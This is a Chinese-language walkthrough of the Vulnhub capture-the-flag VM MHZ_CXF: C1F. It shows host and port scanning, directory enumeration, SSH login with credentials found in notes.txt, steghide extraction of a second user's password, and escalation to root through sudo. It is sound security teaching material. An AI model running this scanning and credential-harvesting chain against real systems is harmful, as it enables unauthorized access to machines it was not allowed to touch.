Vulnhub:MHZ_CXF: C1F

2024-04-08 12:20
文章标签 cxf vulnhub mhz c1f

本文主要是介绍Vulnhub:MHZ_CXF: C1F,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

信息收集

arp-scan

nmap

nikto

WEB

web信息收集

dirmap

gobuster

ssh登录

提权

获得初始立足点

系统信息收集

横向渗透

提权


信息收集

arp-scan
┌──(root㉿ru)-[~/桌面]
└─# arp-scan -l             
Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd:99, IPv4: 192.168.9.88
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.87    08:00:27:47:aa:76       PCS Systemtechnik GmbH

nmap
端口扫描┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -p- 192.168.9.87 --min-rate 10000 -oA ports           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 16:08 CST
Nmap scan report for 192.168.9.87
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:47:AA:76 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 4.68 seconds
版本信息收集┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -sC -sV -O -p 22,80 192.168.9.87 --min-rate 10000                             
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 16:10 CST
Nmap scan report for 192.168.9.87
Host is up (0.00031s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 38:d9:3f:98:15:9a:cc:3e:7a:44:8d:f9:4d:78:fe:2c (RSA)
|   256 89:4e:38:77:78:a4:c3:6d:dc:39:c4:00:f8:a5:67:ed (ECDSA)
|_  256 7c:15:b9:18:fc:5c:75:aa:30:96:15:46:08:a9:83:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:47:AA:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds

nikto
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nikto -h 192.168.9.87                                 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.87
+ Target Hostname:    192.168.9.87
+ Target Port:        80
+ Start Time:         2024-04-07 16:15:19 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a40b796e2191, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /notes.txt: This might be interesting.
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-04-07 16:15:43 (GMT8) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

WEB

web信息收集

没什么可用信息!

dirmap
┌──(root㉿ru)-[~/tools/dirscan/dirmap]
└─# python3 dirmap.py -i http://192.168.9.87/ -lcf                       #####  # #####  #    #   ##   ######    # # #    # ##  ##  #  #  #    ##    # # #    # # ## # #    # #    ##    # # #####  #    # ###### ######    # # #   #  #    # #    # ######  # #    # #    # #    # #   v1.0[*] Initialize targets...
[+] Load targets from: http://192.168.9.87/
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://192.168.9.87/                                                                       
[*] Launching auto check 404
[+] Checking with: http://192.168.9.87/mbaknojufociglkfhofsyblelnqhadaommvbtioivj
[*] Use recursive scan: No                                                                                     
[*] Use dict mode
[+] Load dict:/root/tools/dirscan/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][3.06kb] http://192.168.9.87/index.html                                                        
[200][image/png][3.26kb] http://192.168.9.87//icons/ubuntu-logo.png  

gobuster
┌──(root㉿ru)-[~/kali/vulnhub]
└─# gobuster dir -u http://192.168.9.87/ -x .php,.txt,.html -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.87/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 10918]
/notes.txt            (Status: 200) [Size: 86]

只有remb.txt可以访问,remb2.txt应该被删除了!
除了 first_stage:flagitifyoucan1234 没有可以利用得了!我们尝试ssh登录
用户名:first_stage
密码:flagitifyoucan1234

ssh登录
┌──(root㉿ru)-[~/kali/vulnhub]
└─# ssh first_stage@192.168.9.87  
The authenticity of host '192.168.9.87 (192.168.9.87)' can't be established.
ED25519 key fingerprint is SHA256:Jxm0b2xUhxb2N50E9UVsgn5u7Pow8xX6o12kZDGlTlg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.87' (ED25519) to the list of known hosts.
first_stage@192.168.9.87's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageSystem information as of Sun Apr  7 10:08:16 UTC 2024System load:  0.0               Processes:             90Usage of /:   44.9% of 9.78GB   Users logged in:       0Memory usage: 23%               IP address for enp0s3: 192.168.9.87Swap usage:   0%=> There are 2 zombie processes.
idi^H^H* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8sjust raised the bar for easy, resilient and secure K8s cluster deployment.https://ubuntu.com/engage/secure-kubernetes-at-the-edge285 packages can be updated.
218 updates are security updates.Last login: Fri Apr 24 18:18:07 2020 from 192.168.5.253
$ id
-sh: 1: iid: not found
登录成功!

提权

获得初始立足点
$ bash
first_stage@mhz_c1f:~$ id
uid=1001(first_stage) gid=1001(first_stage) groups=1001(first_stage)
first_stage@mhz_c1f:~$ ls
user.txt
first_stage@mhz_c1f:~$ cat user.txt 
HEEEEEY , you did it 
that's amazing , good job manso just keep it up and get the root bcz i hate low privileges ;)#mhz_cyber

系统信息收集
first_stage@mhz_c1f:~$ uname -a
Linux mhz_c1f 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
first_stage@mhz_c1f:~$ lsb_release -a
No LSB modules are available.
Distributor ID:  Ubuntu
Description:  Ubuntu 18.04.4 LTS
Release:  18.04
Codename:  bionic
first_stage@mhz_c1f:~$ 
first_stage@mhz_c1f:~$ ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root   1615 Apr 24  2020 /etc/passwd
-rw-r----- 1 root shadow 1068 Apr 24  2020 /etc/shadow
first_stage@mhz_c1f:~$ cat /etc/passwd | grep "home" | grep -v nologin
mhz_c1f:x:1000:1000:mhz_c1f:/home/mhz_c1f:/bin/bash
first_stage:x:1001:1001::/home/first_stage:/bin/sh
first_stage@mhz_c1f:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/passwd
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/snap/core/16928/bin/mount
/snap/core/16928/bin/ping
/snap/core/16928/bin/ping6
/snap/core/16928/bin/su
/snap/core/16928/bin/umount
/snap/core/16928/usr/bin/chfn
/snap/core/16928/usr/bin/chsh
/snap/core/16928/usr/bin/gpasswd
/snap/core/16928/usr/bin/newgrp
/snap/core/16928/usr/bin/passwd
/snap/core/16928/usr/bin/sudo
/snap/core/16928/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/16928/usr/lib/openssh/ssh-keysign
/snap/core/16928/usr/lib/snapd/snap-confine
/snap/core/16928/usr/sbin/pppd
first_stage@mhz_c1f:/home$ find -writable -type f ! -path '/proc/*' 2>/dev/null
./first_stage/.profile
./first_stage/.bash_logout
./first_stage/.viminfo
./first_stage/.bashrc
./first_stage/.cache/motd.legal-displayed
./first_stage/.ssh/known_hosts
./first_stage/user.txt
first_stage@mhz_c1f:/home$ 

横向渗透
在上面得信息收集中,first_stage用户没有sudo权限,另一个用户可能存在sudo权限!
我们大概率需要进行横向渗透才行,但是经过信息收集,除了发现几张图片外,没有任何收获!

我们下载到本地进行分析吧!!


binwalk

┌──(root?ru)-[~/kali/vulnhub]
└─# binwalk *.jpeg             Scan Time:     2024-04-07 18:29:35
Target File:   /root/kali/vulnhub/19th century American.jpeg
MD5 Checksum:  5cafa72a6fe50328afaba3de8a8d2926
Signatures:    411DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, little-endian offset of first image directory: 8Scan Time:     2024-04-07 18:29:35
Target File:   /root/kali/vulnhub/Frank McCarthy.jpeg
MD5 Checksum:  764d621ded4a62d04137349d0947610d
Signatures:    411DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, big-endian, offset of first image directory: 8
4704          0x1260          Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"Scan Time:     2024-04-07 18:29:36
Target File:   /root/kali/vulnhub/Russian beauty.jpeg
MD5 Checksum:  fded779eef067f984aea9ecb68a3deac
Signatures:    411DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.02Scan Time:     2024-04-07 18:29:36
Target File:   /root/kali/vulnhub/spinning the wool.jpeg
MD5 Checksum:  44d2017fcafaa9ed3c30a0224473eda7
Signatures:    411DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

使用binwalk、exiftool都没有看到可疑点!

steghide

┌──(root㉿ru)-[~/kali/vulnhub]
└─# steghide info 19th\ century\ American.jpeg 
"19th century American.jpeg":format: jpegcapacity: 27.1 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
steghide: could not extract any data with that passphrase!

使用info参数查看是否存在内嵌数据!发现 'spinning the wool.jpeg' 存在内嵌数据!我们使用 extract 参数提取出来!
┌──(root㉿ru)-[~/kali/vulnhub]
└─# steghide extract -sf spinning\ the\ wool.jpeg
Enter passphrase: 
wrote extracted data to "remb2.txt".┌──(root㉿ru)-[~/kali/vulnhub]
└─# cat remb2.txt  
ooh , i know should delete this , but i cant' remember it 
screw me mhz_c1f:1@ec1f

提权
first_stage@mhz_c1f:/home$ su mhz_c1f
Password: 
mhz_c1f@mhz_c1f:/home$ id
uid=1000(mhz_c1f) gid=1000(mhz_c1f) groups=1000(mhz_c1f),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
mhz_c1f@mhz_c1f:/home$ 
mhz_c1f@mhz_c1f:/home$ sudo -l
Matching Defaults entries for mhz_c1f on mhz_c1f:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser mhz_c1f may run the following commands on mhz_c1f:(ALL : ALL) ALL
mhz_c1f@mhz_c1f:/home$ 
mhz_c1f@mhz_c1f:/home$ sudo /bin/bash
root@mhz_c1f:/home# id
uid=0(root) gid=0(root) groups=0(root)
root@mhz_c1f:/home# 

这篇关于Vulnhub:MHZ_CXF: C1F的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/885569

相关文章

Java中WebService接口的生成、打包成.exe、设置成Windows服务、及其调用、Apache CXF调用

一、Java中WebService接口的生成: 1、在eclipse工具中新建一个普通的JAVA项目,新建一个java类:JwsServiceHello.java package com.accord.ws;import javax.jws.WebMethod;import javax.jws.WebService;import javax.xml.ws.Endpoint;/*** Ti

Spring之整合Apache CXF框架实现WebServices远程调用

基于Spring实现WebSerivces远程调用.底层基于soap传输协议,wsdl对象描述规范 依赖的jar包, cxf版本:apache-cxf-2.7.17 1.配置: applicationContext.xml <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.or

随手记(1)-cxf和xercesImpl.jar冲突

JaxWsDynamicClientFactory clientFactory = JaxWsDynamicClientFactory.newInstance();  Client client = clientFactory.createClient(url);   result = client.invoke("methodName", condition); 在使用CXF框架调用远端

使用CXF开发WebService程序

1、CXF是什么 cxf是一个开源框架,实现webservice开发,它支持多种协议,比如:SOAP1.1,1,2、XML/HTTP、RESTful HTTP 或者 CORBA。 cxf开发的webservice可以通过tomcat运行,cxf开发的webservice服务接口可以和javaweb应用程序部署在一块儿,共同使用一个端口80。 cxf基于SOA面向服务架构理念。依

WebService如何设置基于cxf的wsdl2java生成的客户端超时

基于cxf 3.1.10版本 import org.apache.cxf.bus.spring.SpringBus;import org.apache.cxf.policy.PolicyDataEngine;@Bean(name = Bus.DEFAULT_BUS_ID)public SpringBus springBus() {SpringBus springBus = new Sprin

Vulnhub靶场 | DC系列 - DC9

文章目录 DC-9环境搭建渗透测试端口敲门服务 DC-9 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀k

vulnhub靶场-DC2

一、环境配置 1.下载地址:https://www.vulnhub.com/entry/dc-2,311/ 2.靶场配置:Nat模式   更改hosts文件,官网提示需要更改hosts文件才能访问到网站,否则访问不了 kali进入编辑模式vim,添加上自己的靶机ip地址保存即可 vim /etc/hosts 3.攻击机:kali ip:192.168.111.12

Vulnhub靶场 | DC系列 - DC8

文章目录 DC-8环境搭建渗透测试 DC-8 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC7

文章目录 DC-7环境搭建渗透测试 DC-7 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC4

文章目录 DC-4环境搭建渗透测试 DC-4 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-4,313/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/